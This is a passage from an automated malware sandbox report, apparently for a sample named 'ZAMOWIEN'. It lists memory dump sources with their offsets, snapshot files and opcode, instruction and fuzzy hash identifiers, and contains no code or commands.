                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3b14d04ba091268409e69f97568dd7e7a0109c7cec971acdda533da3d0844b73
                                                                            • Instruction ID: ce5424c4914e2f3441344b1c04440174300cc09e86d36600a1410599378eb9db
                                                                            • Opcode Fuzzy Hash: 3b14d04ba091268409e69f97568dd7e7a0109c7cec971acdda533da3d0844b73
                                                                            • Instruction Fuzzy Hash: 3D011E79A11219ABDB04DF69D941A9EB7B8EF48354F10405AF904F7341D678E9018BA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5445600cdea43e6aec4fb9800b3351f035967c8110fd56e40535a207d78e0db8
                                                                            • Instruction ID: edc5b413f8131f80e9f1f32b9d43614c13f9b633481da35ea5d82819844179be
                                                                            • Opcode Fuzzy Hash: 5445600cdea43e6aec4fb9800b3351f035967c8110fd56e40535a207d78e0db8
                                                                            • Instruction Fuzzy Hash: 91011E75A11219ABDB05DF69D9559DEB7B8FF48314F10405AE904F7340D778EA018BA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                            • Instruction ID: 068c749bb6a512a5c0de3d0295659ccd18c674aae52eef35a3ba4a91fcbc6610
                                                                            • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                            • Instruction Fuzzy Hash: 5EF0FFB6A02214BFE319CF5CC884F5AB7EDEB45694F014069D904DB230E671DE04CAA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e7c8898f07286d6fcb71198aabab6d6004c4f6de0b33ddd7b3f0357f2b820be7
                                                                            • Instruction ID: 847ca39a86f4821071c87aaf2c8249c8e0afc457cfa96dc164b8b27f757db04a
                                                                            • Opcode Fuzzy Hash: e7c8898f07286d6fcb71198aabab6d6004c4f6de0b33ddd7b3f0357f2b820be7
                                                                            • Instruction Fuzzy Hash: 93111E74A11259DFDB04DFA9D541BADF7F4BF08304F048266E518EB381D678D941CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bfa19282f5f4e559e817ad82ee53f1e25c72e45da69fc8036e9077ed937e2153
                                                                            • Instruction ID: ca9e86f9357dd52f62de5ce0798f2129ffcf899c48ed09eed6b5a19944104910
                                                                            • Opcode Fuzzy Hash: bfa19282f5f4e559e817ad82ee53f1e25c72e45da69fc8036e9077ed937e2153
                                                                            • Instruction Fuzzy Hash: 5A012DB8E01249AFDB04DFA9C551A9EB7F4AF18304F008015A915E7340EA74DA00CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 73b1d5705325227faae31994ced72366d77319901ac76174289ab9d1fc565a4f
                                                                            • Instruction ID: 36d30369e4c75f384c60052127fe4e2d6ddb824a112ba33f0dde79f96c8d1ee0
                                                                            • Opcode Fuzzy Hash: 73b1d5705325227faae31994ced72366d77319901ac76174289ab9d1fc565a4f
                                                                            • Instruction Fuzzy Hash: 12F0A47AA11348ABDB04DBBDC815A9EB7B8EF54710F048056E511F7280DEB9D90187A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                            • Instruction ID: 76c20f4c7b77477dd6396ed39a77bc867abc9e65f15eaae8b9c2368920bddb59
                                                                            • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                            • Instruction Fuzzy Hash: 77F0F6BDA01359AFEB05C7AE8940FABB7B8EF80764F048155FD0697244DA70E980C690
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16812bec8a8d2b4655b0d8cb3ac9d967d1889da2b636ce6c46a8d2a24096a423
                                                                            • Instruction ID: 9add3c8f55077ae2ef7d679c97518b03c75dda1c71fbad84a3a5105d00334424
                                                                            • Opcode Fuzzy Hash: 16812bec8a8d2b4655b0d8cb3ac9d967d1889da2b636ce6c46a8d2a24096a423
                                                                            • Instruction Fuzzy Hash: 59010CB4A012099FDB04DFA9C545B9EF7F4FF08304F548165A519EB381DA74DA418B90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                            • Instruction ID: 174be1d482df61bc1e5479455990cc0b65e0211dbf617002673ff0f510bc6282
                                                                            • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                            • Instruction Fuzzy Hash: DBF044BA540308BFE711DB68CD41FDAB7BCEB04714F000165A965E6190EAB0EE44CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 939d35e01c02f87bdc7d116ee6a10a3add43fdf3b6bd4552ab9fa976b7bf1466
                                                                            • Instruction ID: 0e0ff9574dfc40e822c5ad61b8c484004fa377d97641353b7e879bfbdbb7634f
                                                                            • Opcode Fuzzy Hash: 939d35e01c02f87bdc7d116ee6a10a3add43fdf3b6bd4552ab9fa976b7bf1466
                                                                            • Instruction Fuzzy Hash: 8FF0C87B100714AFD711A669D840F93F7FDBFC1B04F404819A65687544DB70F401C750
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9e01589f2ee30c87dcfc9c2c0816e0ce688cc7a22c94ae35228d5b11b8c847b5
                                                                            • Instruction ID: 1df331448a0bdd0c4724100251606c3c0c6f122bcbc6c7e6bbacf27c76ea3604
                                                                            • Opcode Fuzzy Hash: 9e01589f2ee30c87dcfc9c2c0816e0ce688cc7a22c94ae35228d5b11b8c847b5
                                                                            • Instruction Fuzzy Hash: CBF03C79A02248AFCB04DFA9D555A9EB7F4FF18304F408069B955EB381DA74EA01CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e4cc9f551d40ff60fd93c51f1dac8a5ed651fcb75231a8f6d3bf6dba3fb8b01
                                                                            • Instruction ID: c0153b402d2de421557b616e2c728a00ac39d956c47fb9fa7435cd1ca33b65ba
                                                                            • Opcode Fuzzy Hash: 2e4cc9f551d40ff60fd93c51f1dac8a5ed651fcb75231a8f6d3bf6dba3fb8b01
                                                                            • Instruction Fuzzy Hash: B3F08C78A01208AFDB04EFA8D545A9EB7F4EF18300F108459F905EB381DA78EA00CB54
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53545be18f7ea261a5f3583258a4b09ce45a46751f166d4fc2b001d7797e7b83
                                                                            • Instruction ID: 97e270788e0e8ffaac3d93a4f2912641f6218fd510fb3894c2e18601f35fae6f
                                                                            • Opcode Fuzzy Hash: 53545be18f7ea261a5f3583258a4b09ce45a46751f166d4fc2b001d7797e7b83
                                                                            • Instruction Fuzzy Hash: 04F02E7C3826119FFB179A2CDD00B163291BB50F84F144834E549DB5A0DB64CC82D7C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5e61bf42cea59df8dbadf8840104edebdf264e3ff9d6e56154bdc0606025c7f
                                                                            • Instruction ID: 704fcb6d71a97b163d7fd56c24f733a79d1e741aa63f6480d55e2791bc35bdeb
                                                                            • Opcode Fuzzy Hash: d5e61bf42cea59df8dbadf8840104edebdf264e3ff9d6e56154bdc0606025c7f
                                                                            • Instruction Fuzzy Hash: 1EF06D79A11288EFDB04DFA9C915E9EB7F4AF18304F004069E955EB281EA78E901CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 46bb8a55d6fb601b3bb2ca09812a763aad9df31ebd7b48137eb857831bb8dafc
                                                                            • Instruction ID: ff693e75b9053fc0499dfc6b21f7f817b22d530011e73a0e0f0dee86be1d70cc
                                                                            • Opcode Fuzzy Hash: 46bb8a55d6fb601b3bb2ca09812a763aad9df31ebd7b48137eb857831bb8dafc
                                                                            • Instruction Fuzzy Hash: E9F0BE78A12318AFDB04DBA8D911AAEB3F4BF04304F404458A951FB281EB78E901CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 24a8d1fa0edeea4923f7fd8d4d52a48c041735dadac2e6861e7bb81113413761
                                                                            • Instruction ID: e6478465a0ce30e7fe5c111e3ae8d0295c73ee2a1bca2f191fb123d29f5f89d6
                                                                            • Opcode Fuzzy Hash: 24a8d1fa0edeea4923f7fd8d4d52a48c041735dadac2e6861e7bb81113413761
                                                                            • Instruction Fuzzy Hash: 63F0BE78A11358AFDB04DFB9D901E6EB3B4BF14304F444458A910FB281EAB8E901CB54
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba2fbf9c473d55ad8ba1328e7794de45fc6630f25a8404dbf408fcd39c6f5cf3
                                                                            • Instruction ID: 9662d8b761e2c417943c87f6ffb654d254a38fcfff0f684d152ac8db137d138e
                                                                            • Opcode Fuzzy Hash: ba2fbf9c473d55ad8ba1328e7794de45fc6630f25a8404dbf408fcd39c6f5cf3
                                                                            • Instruction Fuzzy Hash: 4FF0BE78A2134CAFDB04DBB8D545B9EB7B4AF18304F148058EA11FB280DAB8E901CB64
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a88233d2da27df64b4570b1044e556dae1270dc6f5b51ca3198cd6cb4ecd87f9
                                                                            • Instruction ID: 7052040c806b27795747fba3b82ef287f01a5f3dd73549cdd81e9ca48910252d
                                                                            • Opcode Fuzzy Hash: a88233d2da27df64b4570b1044e556dae1270dc6f5b51ca3198cd6cb4ecd87f9
                                                                            • Instruction Fuzzy Hash: 8BF0E27DD117F49FE312CB28C580F2277E8EB00BBCF455465DA09CB912CB68E880C650
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c98f073243341cfd3d6a3e90e6595403c53eebe5db2be88c6fd751f35202a831
                                                                            • Instruction ID: 49138f79adc490dc72b5b27e43b5aa3d6ec55e3f18c6222e7cc00f9d4d0105a1
                                                                            • Opcode Fuzzy Hash: c98f073243341cfd3d6a3e90e6595403c53eebe5db2be88c6fd751f35202a831
                                                                            • Instruction Fuzzy Hash: 59F0A0BD911B94AFE322C729C188F2A77E8AB01BBCF059561D91D8B511CB78D880C650
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6296a9d2628b145b7f26ca8fa4f51282ddead39b51ec2dc09856de07e391f0f
                                                                            • Instruction ID: 54521c41f2f53838f673fdec065996e7fdc3197c42d1e0df4d9966548a6e7f81
                                                                            • Opcode Fuzzy Hash: b6296a9d2628b145b7f26ca8fa4f51282ddead39b51ec2dc09856de07e391f0f
                                                                            • Instruction Fuzzy Hash: 59F08278A16259ABDB04DBA8D915E6EB3F4AF04704F440458BA11EB2C5EA78D901C794
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4d7fdd80e5aa1f746699b087372e92d155634552fee15ed6d3a3198d01cc6ddc
                                                                            • Instruction ID: 7c657688cf1a6127229ae82ca5a383f07453669b89f5ac6bb7e173f6424b7ec7
                                                                            • Opcode Fuzzy Hash: 4d7fdd80e5aa1f746699b087372e92d155634552fee15ed6d3a3198d01cc6ddc
                                                                            • Instruction Fuzzy Hash: EAF0E278A02208ABDF04DBBCD945E9EB7F4AF09348F540058A911FB2D0EA78D9008754
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                            • Instruction ID: 52cb2345eee734b87071a10882f719c32cf2996602573b0b5f12383dc1a9f703
                                                                            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                            • Instruction Fuzzy Hash: A5F0E53350461467D231AA1D8C05FABBBACDBD5B74F10431ABA249B1D0DAB09901CBD6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04945e335e6bc06a6760394a500f18f2fb283da9a6811fe65a3e2540fec56bc5
                                                                            • Instruction ID: af1e343329474deb1c239f2dbe2c07c682222c0c18b600562e664e43bf2ef7b7
                                                                            • Opcode Fuzzy Hash: 04945e335e6bc06a6760394a500f18f2fb283da9a6811fe65a3e2540fec56bc5
                                                                            • Instruction Fuzzy Hash: 5DF082B8A1225DABDB04DBA8D916E5EB7F4BF44308F440459BA51EB2C0EB78E901C754
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4eb6f1bb62c38b7690cc8cdea25f136ee3e14caf0e43a32d970917e0b4caf893
                                                                            • Instruction ID: c076b4394fed2a1a62885d72741ca00a4c4c945d411aa3d1c831c08519178fef
                                                                            • Opcode Fuzzy Hash: 4eb6f1bb62c38b7690cc8cdea25f136ee3e14caf0e43a32d970917e0b4caf893
                                                                            • Instruction Fuzzy Hash: CDF08279A11348ABDB04DBA9C556E9E77B4EF18704F440054E601EB2C0DD78D9018754
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
